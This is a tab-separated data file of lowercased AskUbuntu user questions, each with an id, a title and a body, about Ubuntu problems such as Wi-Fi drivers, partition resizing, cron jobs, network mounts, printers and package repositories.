477098	teamviewer mouse wont open the laucher	i have an issue that i am unsure of the root , as in weather it is an ubuntu issue or a teamviewer issue . on my computer i have the launcher auto-hide , while connected to it from a windows computer and an android phone and tablet the mouse is unable to open/bring up the launcher , pretty much every other thing seems to work except the launcher behavior . i have a feeling that it is a teamviewer issue but im hopeing people can help me out .
477099	update android when ubuntu phone is installed	i have installed android and ubuntu phone on my nexus 4 . yesterday i received an update from android to 4.4.3 which first downloaded correctly but when installing and do the necessary reboot , the device booted into ubuntu . i turned the device off and on again ( booting to android now ) but the update did n't install . is it even possible to make an update with a dualboot installed ?
477100	broadcom wi-fi drivers wo n't activate on retina macbook pro	i 'm on a rmbp ( macbook pro ) and have the exact same issue as this post except i 'm using 14.04 . it looks like his problem was solved when he connected via ethernet however ... .i do n't have an ethernet port ... . just like him , drivers activated fine when booted from usb , but after installing , no go . i am dual booting osx with working wi-fi if that makes a difference
477102	change default display of the ubuntu screen	currently i am working on a customize device ( just like tablet ) which has ubuntu 12.10 . now i have to restructure the screen of that device . i have added sample design of the screen . we are getting this screen when we start the device . how can i achive this . i know for this i have make changes in many configuration files of ubuntu . but i do n't know how to start and in which files i have to make changes . so that i need some guidelines for this ? and we are using lightdm as display manager . terminology internet connection message - if i connect to internet using lan then we have to show connection establised image logo - it just a logo online/offline - if system is online on the server then we have to show green circle ( like skype or facebook online option ) else display red circle for offline . camera - we have a camera for capturing the video edit also we are using awesome framework window manager for x-server . feel free to ask me any question and sorry for bad english .
477104	best way to enlarge system partition	i have a problem - i need to enlarge my system partition . i mean - when i initially installed ubuntu , i split the partition so i have 15gb for system and the rest ( around 400 ) pointed at /home/ . this is very useful if anything goes wrong someday and i want to format and completely re-install ubuntu without losing any of my actual data . the problem is , 15gb is n't enough , so it seems . i already moved /var/ and /opt/ folder to /home/ , adding symlinks at root , but i 'm still at 86 % usage and i 'm having performance issues ( mostly when booting or running a vm ) . i can use ubuntu on a flash drive and externally enlarge the partition , but i 'm really afraid with going forward with that plan . also , despite what i said before , i 'd like to avoid re-installing the system if at all possible . any advice , suggestions or ideas on how to best approach this ? any warnings i should heed ? thanks in advance ! update here 's the gparted screenshot - as you can see , there 's windows on dual boot ( sda1-5 are all related to the windows system ) , then i have a linux swap , 14gb ( so uh ... not even 15 ) of system and 435 of for /home .
477105	storage devices mounting problem	i 'm using xubuntu 14.04 ( 64bit ) and i have two internal hard disk drives installed , few days ago i accidentally ejected one partition . i tried to remount it but it gave me an error . i 've already had pysdm installed so i remount the disk without having any problem . the problem occurred when i restarted the computer , some errors appeared before login screen comes '' the disk drive for /media/sdc8 is not ready yet or not present continue to wait , or press s to skip mounting or m for manual recovery `` this type of errors appeared for all the drives . since i 'm really new to linux i 've no idea about manual recovery using terminal , so i skipped mounting all the drives . every time i restart the computer it fails to mount the drives . i can mount the drives using pysdm but if i close the file manager window and started a new one it does n't show the drivers , i have to unmount and remount the drivers again and again every time i start a new file manager window some software can access the disks after i mount it using pysdm but some software does n't work well ( virtualbox does n't work well with its virtual disks ) i also have to mount my flash drive using pysdm but my digital camera ( flash memory ) get mounted automatically without any problem i 'm really new to linux and ubuntu , please help me to get through this . thank you in advance
477107	ubuntu 14.04 bootable drive ignored during booting up ( eee pc 1000hg )	i am new to this site so hello ! i have recently acquired eee pc 1000hg and would like to use it as my linux machine , it has ubuntu 13 installed but i want to wipe it and install 14.04 . my problem is that my bottable usb ( made using unetbootin ) is ignored during startup , ubuntu 13 sees the drive perfectly fine but booting process completely ignores it . i even changed the boot settings to boot only from removable media , but it just displays a message asking to insert a proper media . i have used ubuntu bootable usb on many occasions before and it always worked fine , this time it does not ( i am actually using the same usb stick that worked before ) . any suggestions as to why this might be happening ? perhaps i should try partedmagic and wipe the hdd clean ? thank you kindest regards
477108	gtk-critical ** : gtk_widget_modify_bg : assertion `gtk_is_widget ( widget ) ' failed	when running eog from console , many errors are being printed on the screen . one of them which keeps occuring is the following : ( eog:9177 ) : gtk-critical ** : gtk_widget_modify_bg : assertion `gtk_is_widget ( widget ) ' failed any idea what it means ? should i expect that the image i am seeing is not presented properly ? if this is a bug , where and how i should report it ?
477109	google chrome tagged with specific web site - wo n't start from launcher	i just upgraded from google chrome v33 to v35 . after that i got duplicate icons in the launcher . after unlocking the original icon i ca n't get lock it back to the launcher without a tag to the itsfoss.com website . closing chrome and clicking the icon in the launcher does nothing . i can start chrome normally from the unity launcher button though . any ideas on how to get the standard chrome launcher icon back ?
477110	14.04 lts no dash / launcher after update through software updater	i 'm getting no dash / launcher after i login . this started after an update through the software updater . please help to fix ... i 've already lost a day trying different options posted on askubuntu.com . nothing worked . got to the terminal via ctl + alt + f1 and logged-in successfully . here are the logs : .xsession-errors script for ibus started at run_im . init : unity-panel-service main process ( 2315 ) terminated with status 1 init : indicator-printers main process ( 2459 ) terminated with status 1 init : unity-settings-daemon main process ( 2300 ) terminated with status 1 init : upstart-dbus-session-bridge main process ( 2293 ) terminated with status 1 init : hud main process ( 2304 ) killed by term signal init : indicator-bluetooth main process ( 2446 ) killed by term signal init : indicator-power main process ( 2448 ) killed by term signal init : indicator-datetime main process ( 2451 ) killed by term signal init : indicator-sound main process ( 2453 ) killed by term signal init : indicator-session main process ( 2483 ) killed by term signal init : indicator-application main process ( 2486 ) killed by term signal init : disconnected from notified d-bus bus update ( jun 8 , 2014 ) : okay , i have reset unity , but i can not login normally via the login screen . steps i follow : 1 . login screen - > blank ... no dash / no launcher / no status ( notification ) bar on top 2 . ctrl+alt+f1 to bash terminal 3. export display=:0 4. unity-tweak-tool -- reset-unity ( this does not complete , blocks on opengl ) 5 . i anyways continue to by doing : ctrl+alt+f7 . 6 . launcher & dash look good . but there is ( a ) no status / notification bar on top 7 . continuing to work this way . have n't logged out since .
477111	how can i install .deb files from terminal , i tried different ways in askubuntu	i am trying to install teamviewer and i am getting the following error and the entire process is as follows kittu @ kittu-355v4c-356v4c-3445vc-3545vc : ~ $ sudo dpkg -i teamviewer_linux_x64.debdpkg : error processing archive teamviewer_linux_x64.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : teamviewer_linux_x64.deb the file is in home/downloads/teamviewer_linux_x64.deb
477112	why do i have 2 ip addresses for the same computer ?	i have a question . so i have a 32-bit ubuntu server 12.04 lts set up on one of my computers . i set up a static ip address for this computer , but now when i go see what devices are using my internet , i notice that my linux server has 2 different ip addresses and both have the same mac address . i can still ssh into it no problem , but it kind of annoys me seeing two different ip addresses for the same server . any way to get rid of the other ip address that is not the static ip address that i set up ? i do n't know if this is important but i have a netgear wndr 3700 v3 . any help would be greatly appreciated . thanks : ) config # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback iface eth0 inet static address 192.168.1.91 netmask 255.255.255.0 broadcast 192.168.1.255 gateway 192.168.1.1 # the primary network interface auto eth0 iface eth0 inet dhcp my /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.1.1
477113	ubuntu 14.04 fails to start or wake up	i 'm facing one or more problems with my ubuntu 14.04 system . the machine refuses to start ( cold boot ) sometimes . i adapted my grub settings as follow : grub_default=0 grub_hidden_timeout=2 grub_hidden_timeout_quiet=false grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' splash radeon.dpm=1 '' grub_cmdline_linux= '' acpi_sleep=nonvs '' grub_gfxmode=640x480 grub_init_tune= '' 480 440 1 '' when ubuntu fails to start , i can see the count down going from 2 to 0 but then , nothing happens : no hard drive activity , keyboard is frozen ( numlock ) . i must long press the power button and restart the computer in order to hope ubuntu to start . some other times , the same scenario occurs but the hard drive led is on and remains like this . i thought about some fsck check at boottime but the hard drive seems to be inactive ( no head sound ) . i also thought about something with the graphic driver ( like dpms ) , added some extra parameter like ( radeon.dpm=1 ) , but without success . at least , once ubuntu finally starts , i get several windows inviting me to report internal problems . i face the same kind of issue when the computer goes to sleep after a long period of inactivity . the system goes to sleep the right way ( i checked the logs ) , the power led blinks as expected but i 'm unable to wake the computer most of the time . either i remain with a blank screen and the computer seems frozen ( no hard drive activity , keyboard led frozen ) , either the computer starts to wake up for a short moment before rebooting ( and get locked as above ) , or it wakes up but sometime freezes after a few seconds . could you please tell me what to do ? please , do not hesitate to ask me some logs or configuration files if needed . thanks !
477118	how to change the volume of left channel using pulseaudio	i am recording the video using logitech camera and bluetooth microphone . logitech can used for recording both audio and video . when i turn on bluetooth microphone in the middle of recording , it is replacing the logitech audio channel due to this we are getting the bluetooth audio from the left channel . but when i turn off the bluetooth then i get the logitech audio on left channel but the volume is very low and also getting the some noise . i am using pulseaudio and ffmpeg for recording purpose . so how can i increase / change the volume of left channel during runtime from the command line ? edit my ffmpeg command ffmpeg -loglevel warning -y -f v4l2 -s 544x288 -i /dev/video0 -vstats -vstats_file '/home/ubuntu/pra_app/videos/10-36-14/left-stats ' -f pulse -name 'left_mic 0 ' -i alsa_input.usb-046d_0823_d81a0330-00-u0x46d0x823_1.analog-stereo -f pulse -name 'right_mic 1 ' -i alsa_input.usb-046d_0823_4b709030-00-u0x46d0x823.analog-stereo -f pulse -name 'default 0 ' -i default -f mpegts -crf 20 -r 24 -pix_fmt yuv420p -vcodec libx264 -vprofile baseline -t 02:00:00 -map 0:0 -map 1:0 -map 2:0 -map 3:0 /home/ubuntu/pra_app/videos/10-36-14/left.mp4
477121	cron does n't execute one of the scheduled jobs	i 'm using a lubuntu desktop , distribution ubuntu 13.10 , i686 . this is my problem : in the job list scheduled by cron a job has n't effect , but in /var/log/syslog its execution is traced . this is the relative log line : jun 4 09:06:01 kiosk cron [ 14189 ] : ( root ) cmd ( /usr/bin/xinput set-prop 12 -- type=float `` coordinate transformation matrix '' 0 -1 1 1 0 0 0 0 1 > > /tmp/mybackup.log ) this job should rotate touchscreen mapping . i try different solutions : i substitute in crontab the with bash -c `` '' , i set `` export display=:0.0 '' ( `` for graphics related job in unix environment we need to set first the display ... '' ) before the command , ... and many other ! i know there are a lots of details affect cron execution ( path , environment variables , special character and other ) and i have no more idea by now : ( could some gentleman suggest me an idea ? where can i find the problem ? thanks in advance !
477130	nothing happen after a command mount -t ( worked before )	i 'm having a weird problem . i used to run the mount command manually to link a folder on my plex server with a folder on my nas . it was fine until yesterday , but i had to halt the plex server and when i tried to mount the directory again nothing happened . it asked me for the su password and that 's all . here 's the relevant line from my /etc/fstab : //192.168.1.2/series_tv /home/cidou/series_tv cifs _netdev , credentials=/home/cidou/.smbcredentials 0 0 //192.168.1.2/films /home/cidou/films cifs _netdev , credentials=/home/cidou/.smbcredentials 0 0 i tried this command too : sudo mount -t smbfs //192.168.1.2/films /home/cidou/films -o user=myname , password=mypass , sec=ntlm -- verbose i run an ubuntu 12.04 lts uname -a linux plex 3.8.0-29-generic # 42~precise1-ubuntu smp wed aug 14 15:31:16 utc 2013 i686 i686 i386 gnu/linux
477134	network monitoring system	i 'm looking for a network monitoring system with these requirements . so far we tested icinga but it did n't work well on our 32 inch : freeware/gpl monitor linux/windows good for 32 inch display switches be able to send alerts by email
477138	xubuntu 14.04 black screen after monitor off/on	i have a hp desktop machine with ubuntu 14.04 , with also xubuntu and gnome desktops installed . i mostly use the xubuntu session . when using the xubuntu session , when i power off my monitor , and power it back on , the screen stays black and i can not do any work . with ctrl-alt-f6 i can open another virtual terminal , and then the screen works again , but if i to go back to the desktop session with ctrl-alt-f7 , all i have is a black screen . but , if i login to unity ( the ubuntu default session ) , or to gnome , and turn the monitor off and back on , everything works ok. also , if i log out , and while in the lightdm greeter , turn the monitor off and back on , everything works ok. what could be the cause for this , and how to fix this ?
477141	ubuntu installer not detecting microsd	i need to install ubuntu server 13.10 on a microsd when i reach the step where i need to choose the disk to install the system on i do n't see my sd card among the options how to solve that ? thank you
477142	lineage 2 ( game ) cant run	i have download and install lineage 2 ( game ) and i search on internet how to run it the only think i found was to download wine and then i will be able to play it.but i downloaded and when i double click on the l2.exe i can see it on the system monitor running for 1 min but then dissapear , and the game is not running at all . i dunno know what else to do can you help me ?
477144	flash storage settings	i know this has been asked before , but how do i change the adobe flash player storage settings in ubuntu 14.04 ? i do know that the following link : https : //www.adobe.com/support/documentation/en/flashplayer/help/settings_manager07.html â website storage settings panel can be used , but when i access it , it shows me nothing in `` list of websites '' . is there any other way to change the flash storage settings ? also , right clicking on flash content , then on settings , does not work .
477148	ubuntu 14.04 - only performance and powersave governor available ( i5 4.gen )	after updating my ubuntu 13.10 to 14.04 there only these to govenors available for my cpu , instead of additionally ondemand and conservative . cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors performance powersave my cpu is a intel ( r ) core ( tm ) i5-4200m cpu @ 2.50ghz , my laptop a lenovo b5400 80b6qb0 and my kernel version is 3.14.1-031401-generic x86_64 before updating the four governors were available . if this is important , i have installed tlp and indicator-cpufreq . how do i get back the missing two govenors ? ondemand is really important to me because of power saving .
477152	problems with tray icon from teamspeak ( 14.04 )	last day i installed teamspeak on my new ubuntu 14.04 ( 64 bit ) . at first , i saw that the tray icon was n't there , and in ts settings was activated , the icon . so i googled for that problem and i found a solution ( solution i found : http : //www.webupd8.org/2013/05/how-to-get-systray-whitelist-back-in.html ) . i could fix the hidden tray icon . but now , i have a new problem : my desktop with the wrong icon : image as you can see , the icon is there , but not in the correct place ( is on the top left corner ) , and i have problems for close applications maximized ( mainly because the tray icon is there ) . if i try to hide and show again the tray icon from ts options , the icon is still in there . so , that 's my problem ...
477154	problem while installing android adt	i got this error message , while installing android adt gzip : stdin has more than one entry -- rest ignored tar : child returned status 2 tar : error is not recoverable : exiting now
477157	oxwell does not load graphics on webpage	im running ubuntu server 10.4.4 with lamp installed . i have setup oxwell by creating a folder in /var/www/oxwell and unzipping contents . i have also chmod -r 777 /oxwell for testing . opening a webrowser it is only showing text and no graphics . i have managed to install oxwell from the browser but it still is showing text only . please see example below .
477165	how to disable framebuffer in initramfs ?	while using plymouth , i have late splash and tried to fix it , i googled and got lots of suggestions on doing this : vi /etc/initramfs-tools/conf.d/splash and add : framebuffer=y and update-initramfs -u after doing this , i have no splash at all . so i deleted the framebuffer=y and re-update initramfs , splash came back . after that i installed something , maybe it 's remastersys or n86v or their dependencies , or something else , i have splash gone again and according to the boot.log , i think it 's due to framebuffer enabled in initramfs again . i tried frambuffer=n in /etc/initramfs-tools/conf.d/splash but failed . now i have no splash and still ca n't get it back . does anyone know how to disable framebuffer in initramfs ?
477167	joomla files/folders permissions in ubuntu	the recommended way of setting files and folders permissions in the joomla root directory is the following ( from the help.ubuntu website ) cd /var/www/joomla/ sudo find . -type f -exec chmod 644 { } \ ; sudo find . -type d -exec chmod 755 { } \ ; can anyone explain the purpose of the { } and the \ in the two chmod statements above ?
477169	snmpd returns incorrect value for shared memory	i upgraded ubuntu from 12.04 to 14.04 . now my monitor software reports share memory 100 % full . snmpwalk host-resources-mib : :hrstoragedescr.8 = string : shared memory host-resources-mib : :hrstoragesize.8 = integer : 552 host-resources-mib : :hrstorageused.8 = integer : 552 df -h none 522m 0 522m 0 % /run/shm ls -la /dev/shm lrwxrwxrwx 1 root root 8 jun 5 09:33 /dev/shm - > /run/shm
477178	avoid double titlebar in gnome apps running under xfce ?	when i run gnome ( gtk3 ? ) apps under xfce , they get a double titlebar : is there any way to avoid this under xfce ? i 'm running xubuntu 14.04 .
477179	what do i do if launchpad repository does n't exist anymore ?	recently , ubuntu told me that it failed to resynchronize the package index files from their sources . here 's the output of apt-get update : ... w : failed to fetch http : //ppa.launchpad.net/attente/1218322/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/attente/1218322/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i 've got little or no experience with launchpad . that said , i figure the repository no longer exists . and if 1218322 is a repository name , then it 's a strange one , is n't it ? anyway , probably it got renamed to : http : //ppa.launchpad.net/attente/modifier-only-input-switch/ubuntu in truth , i do n't even remember adding this repository . it 's in sources.list.d/attente-1218322-saucy.list . as far as i can tell , i have all the 3 packages installed , but they exist elsewhere ( http : //ua.archive.ubuntu.com/ubuntu/ ) . so i lean towards getting rid of this repository . and the other one i do n't remember adding : sources.list.d/tuxpoldo-btsync-saucy.list , http : //ppa.launchpad.net/tuxpoldo/btsync/ubuntu p.s . surprisingly , apt-cache policy still lists this repository as one of the options for gnome-settings-daemon as opposed to the other 2 packages : $ apt-cache policy gnome-settings-daemon gnome-settings-daemon : installed : 3.8.5-0ubuntu11.2 candidate : 3.8.5-0ubuntu11.2 version table : *** 3.8.5-0ubuntu11.2 0 500 http : //ua.archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 100 /var/lib/dpkg/status 3.8.5-0ubuntu10ppa2 0 500 http : //ppa.launchpad.net/attente/1218322/ubuntu/ saucy/main amd64 packages 3.8.5-0ubuntu9 0 500 http : //ua.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages so , what am i to do ? but addressing other issues i ran across along the way is appreciated as well .
477180	how to mount a local directory to a remote directory on a remote server	how can i mount a local directory in my local ubuntu machine to a remote directory on a different server ? i.e . is if ~/local_directory/bin/exec , it will execute the exec in the remote server ?
477181	how to stop dns attack in dns server	my dns server is receiving hundreds of query request in every minutes from unknown users . how can i stop this ?
477184	help installing microsoft office 10 in ubuntu 14 64 bits using winetricks	i was trying to install microsoft office in ubuntu 14.04 64 bits using winetricks , i selected wine default prefix , then choose dlls dotnet20 and msxml6 after that a warning message appears ( mono not installed , but it was installed previously )
477185	likewise download for ubuntu 14.01 without internet connection	i have installed ubuntu 14.01 . i want to install likewise open . can any one help me from where i have to download the likewise package . i do n't have internet connection with my ubuntu machine . also can any one tell me step by step procedure to install the package and precautions to take care . any kind of help will be appreciated . is it important to syncronise time and date in my windows server and ubuntu machine .
477190	software that optimally fills a cd ? ( best fit )	i 'm looking for software that takes a group of folders and tries to assign them to a cd with the least amount of wasted space . ideally , the software should : let me specify a custom size for the storage media . not split a folder across multiple cd 's . not insist on burning the cd 's itself , it should give me the option of just grouping the data so i can burn them myself . windows has a couple of software packages that do this : burn to the brim : http : //bttb.sourceforge.net/ size me : http : //lars.werner.no/ ? page_id=2
477191	software center is not working after attempt to install skype	i am completely new person on linux . i installed it just today and i have to say i like them a lot , until i faced the problem . i was looking on the internet but nothing worked for me . after i downloaded skype and tried to run it , software center showed up and was loading something for 5 mins . then it just dessapeared . now everytime i try to turn it on , the window is gone after 3 sec . i tried to kill it but didnt really wokrked . i get this message when trying to run it from the terminal : whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 240 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 131 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 330 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 225 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains when trying to kill it via terminal , it says there is no process like this . thx guys for help ! help me like ubuntu for rest of my life ! : p
477195	delay cairo-dock	running ubuntu 14.04 . i want to delay cairo-dock . what should be in the command in `` startup applications '' . i tried it with : `` sleep 10 ; cairo-dock '' but that does n't work . what is the proper syntax to use ... fyi i want to delay cairo-dock because when it starts immediately it ruins the shutdown options in the top panel ( seems to be a known but unsolved bug )
477197	problem to current security	i have install ubuntu in my lap . but after restarting my lap there is a message that `` ubuntu has blocked by current securty policy '' what can i do ?
477199	error building an arm ltsp client image	i have installed ltsp on an ubuntu 14.04 server and am trying to build an arm client image using sudo ltsp-build-client -- arch armhf the goal is to log into the server using a raspberry pi with berryterminal . but i keep getting the following error : w : failure trying to run : chroot /opt/ltsp/armhf mount -t proc proc /proc w : see /opt/ltsp/armhf/debootstrap/debootstrap.log for details debootstrap.log : chroot : failed to run command 'mount ' : exec format error can anyone tell me how i can get get this working ? building the amd64 client work 's perfectly fine .
477201	change the keyboard shortcuts to focus on doky	is there any way to change the focus of keyboard shortcut from unity launcher to docky ? so when i press super+1 the first app in docky will open not the first unity launcher app .
477207	second time suspend did n't works on 14.04	i have dell xps l702x and suspend/resume works well on first time after boot . but if i close the notebook second time after resume nothing happens . no disk , screen or other specific activity . what could be wrong ? i have fresh installed 14.04 p.s . after installing pm-utils sudo pm-suspend works fine , even several times , but still no suspend on lid close . in gnome-power settings suspend action on lib close are selected in both cases ( battery and power ) but the suspend choice is grayed .
477209	how to run hiphop with an old libc6 ( not solved )	coming from hereâ libc.so.6 : version `glibc_2.16 ' not found i see that is somewhat possible to run a programs against a library that is not hard installed in the os . i would want to know how to put a libc6 updated in a place of the system ( but without installing it ) and linking it to a small program to run ( hiphop in this case ) . however , although i am in 11.10 and the best way would be installing an updated os , i want to know how to do this , because this can happen in other situations ( like installing old libs in a new system ) , and i do n't know how to do it . in short : i would want to know if it is possible to `` pack '' a set of libs in a place in the system , but without having conflicts with the installed ones in order to run old programs or in other to run new programs in old versions of ubuntu . thanks ps . this is my first question here and i am also not english native , so if i made a error to post it here , please do n't ban me , just say me politely what i did wrong .
477212	ubuntu boot time	i left windows for linux , one reason was the long boot and shut down times . i have found most linux os 's to boot very fast . yet ubuntu and ubuntu derivatives boots very slow . i have even tried lubuntu , which also boots slow . once up and running ubuntu is very fast and responsive . the long boot times is what has kept me using debian instead of ubuntu . does anyone know why ubuntu takes longer than other linux os 's to boot ? are there any plans to improve boot times ? i would like to use ubuntu but hate the longer boot times . i do n't think that is the problem . same computer , same network , same everything . i have tried with different variations , as unity , gnome , mate and cinnamon . same on usb live installations . have also tried other ubuntu based os 's like ultimate editon and boot repair . i know it is not on every derivative . i have zorin on a tower that boots pretty decent and run mex on a usb that is still a fast boot . ubuntu has boot times about the same as windows 7 . i have also went to startup applications and unchecked services i do n't need . no difference . right now i am using point linux and it boots extremely fast on the same computer with no changes to services from the original installation . the screen that says ubuntu and has the dots just takes a long time , not sure what is happening behind the screen at that time , but that is where the hang up is to be found .
477213	want to install ubuntu 13.04 alongside windows xp on an pld pc	ms windows xp professsional sp2 intel pentium 4 cpu 2.66ghz , 991mb ram , via/s3g unichrome igp my pc is fairly old , about 5 yrs to be exact . want to install ubuntu 13.04 alongside windows xp . please give me the detailed procedure to install it . i am a novice at it so no jargon please . ok. thnx . : )
477214	ubuntu 14.04 intel centrino wireless-n 130 ( rev 34 ) dropping connection	i have just started using ubuntu for the first time . my wifi connection keeps dropping ( it never did in windows ) . i have read various threads , but people say it 's wireless card specific and i have n't found one for this problem with ubuntu 14.04 and this card . the problem is intermittent - yesterday it never dropped , today it started dropping every couple of minutes . if i click on the wireless icon , after it has disconnected , my router does n't show . if i click 'enable wifi ' to disable it , and then click it again , my connection returns . i had a look at syslog , and it was showing reason 7 . the problem is worse when i am physically further away from the router . would appreciate any help , andrew
477217	konica minolta bizhub printer does not print under ubuntu 14.04 64 bits	i have a network printer konica minolta bizhub c20p . until yesterday , i 'd been able to print for the past couple of years . i had ubuntu 10.04 , i upgraded to 12.04 a couple of days ago ( both 10.04 and 12.04 were 32 bits ) . yesterday i did a fresh installation of 14.04 64 bits , and today i 've been trying to get the printer to work . i 've tried several things : a. install a new printer through system settings/printers , then either 1. add a driver file kmc20pnp.ppd which i downloaded from the minolta download centre ( which is the driver i had until yesterday , which worked for all these years ) , or 2. select the printer model from a list ; b. install a new printer through localhost:631 with 1. and 2 . ( every time i try a new thing , i uninstall the unsuccessful printer first ) ; c. i 've also tried selecting ipp and lpd printers , the last thing i tried was type lpd : //ip_address/print on the device uri , which ended up in crashing the printer d. also some of what 's described here about the i386 architecture : ca n't get my canon lbp printer to run under ubuntu 14.04 ( i had problems before while trying to install acroread that had to do with an incompatibility between i386 and amd64 , so i thought that might be the problem ) . whenever i try to print a test page or otherwise connect to the printer ( like when i for instance change the ipp : address ) it keeps crashing ( it 's a copier and printer at the same time , so when it crashes , no one can print anymore , it does n't respond to pings , and the copier does n't respond either ) . any insight on what 's happening and how to solve it will be very appreciated .
477218	limiting nproc in an upstart job	what exactly does the stanza limit nproc 20 20 in an upstart job do ? i 've read the documentation here ( http : //upstart.ubuntu.com/wiki/stanzas # limit ) , and it seems like it would limit nproc for any process related to the job . however , i do n't see this effect when i 've added this to my job 's conf file - in this specific case , i 've confirmed that my test job 's single process was able to fork more than 20 child processes . any advice ? thanks .
477222	wifi not recognized	i had wifi and worked then some day ubuntu asked me to update some packeages and restarted the system and after that no wifi . this is my wireless_script output : # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux s510p 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 02:00.0 network controller [ 0280 ] : qualcomm atheros qca9565 / ar9565 wireless network adapter [ 168c:0036 ] ( rev 01 ) subsystem : lenovo device [ 17aa:3026 ] kernel driver in use : ath9k 03:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8162 fast ethernet [ 1969:1090 ] ( rev 10 ) subsystem : lenovo device [ 17aa:3807 ] kernel driver in use : alx # # # # # lsusb # # # # # bus 001 device 006 : id 0eef : a111 d-wav scientific co. , ltd bus 001 device 007 : id 0cf3:3004 atheros communications , inc . bus 001 device 004 : id 174f:1488 syntek bus 001 device 003 : id 03f0:5607 hewlett-packard bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 002 : id 15d9:0a4c trust international b.v. usb+ps/2 optical mouse bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto dsl-provider iface dsl-provider inet ppp pre-up /sbin/ifconfig wlan0 up # line maintained by pppoeconf provider dsl-provider auto wlan0 iface wlan0 inet manual # # # # # iwconfig # # # # # wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface # # # # # resolv.conf # # # # # # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : alx state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : unmanaged default : no hw address : < mac address removed > capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq no-auto-default= < mac address removed > , [ ifupdown ] managed=false # # # # # iwlist # # # # # wlan0 scan completed : cell 01 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=55/70 signal level=-55 dbm encryption key : on essid : '' mohsen '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000076c342498 extra : last beacon : 12ms ago ie : unknown : 00066d6f6873656e ie : unknown : 010882848b960c121824 ie : unknown : 030101 ie : unknown : 2a0104 ie : unknown : 32043048606c # # # # # iwlist channel # # # # # wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz # # # # # lsmod # # # # # ath3k 13318 0 bluetooth 395423 23 bnep , ath3k , btusb , rfcomm ath9k 164164 0 ath9k_common 13551 1 ath9k ath9k_hw 453856 2 ath9k_common , ath9k ath 28698 3 ath9k_common , ath9k , ath9k_hw mac80211 626489 1 ath9k cfg80211 484040 3 ath , ath9k , 